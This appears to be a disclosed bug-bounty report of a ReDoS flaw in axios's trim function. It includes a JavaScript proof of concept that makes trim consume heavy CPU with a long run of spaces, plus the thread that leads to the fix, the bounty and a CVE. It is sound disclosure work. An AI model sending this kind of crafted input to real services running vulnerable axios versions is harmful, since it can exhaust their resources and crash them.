Inefficient Regular Expression Complexity in axios/axios

Valid
Reported on Aug 26th 2021

✍️ Description

A ReDoS (regular expression denial of service) flaw was found in the axios package. An attacker that is able to provide crafted input to the trim function may cause an application to consume an excessive amount of CPU.

Similar attack ref: https://nvd.nist.gov/vuln/detail/CVE-2020-7753

🕵️‍♂️ Proof of Concept

Create the following poc.js

// poc.js

var {trim} = require("axios/lib/utils");


function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}


return ret + "1";
}


var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)

Execute the following command in another terminal:

npm i axios
node poc.js

Check the Output:

time_cost: 2639

💥 Impact

This vulnerability is capable of exhausting system resources and leads to crashes. 📍 Location utils.js#L188

Occurences

ready-research submitted a
21 days ago
ready-research
21 days ago

Researcher


With the above patch, the output is

time_cost: 6
ready-research
21 days ago

Researcher


var {trim} = require("axios/lib/utils");

function build_blank (n) {
var ret = "1"
for (var i = 0; i < n; i++) {
ret += " "
}

return ret + "1";
}

var time = Date.now();
trim(build_blank(50000))
var time_cost = Date.now() - time;
console.log("time_cost: " + time_cost)
ready-research
21 days ago

Researcher


https://github.com/axios/axios/issues/3977

ready-research
20 days ago

Researcher


https://github.com/axios/axios/issues/3978

ready-research
20 days ago

Researcher


@admin Can you please help to report this in the GitHub repo?

ready-research
20 days ago

Researcher


https://github.com/axios/axios/issues/3979

ready-research modified their report
20 days ago
ready-research
20 days ago

Researcher


https://github.com/axios/axios/pull/3980

ready-research
16 days ago

Researcher


@admin The issue got confirmed and fixed in https://github.com/axios/axios/pull/3980(proposed by me) Fix: https://github.com/axios/axios/commit/5b457116e31db0e88fede6c428e969e87f290929

Jay confirmed that a fix has been merged on 5b4571 16 days ago
ready-research has been awarded the fix bounty
$125
Jamie Slome
15 days ago

Admin


CVE published! 🎉

It should be added to the National Vuln. Database shortly.

ready-research
9 days ago

Researcher


The issue got fixed in 0.21.2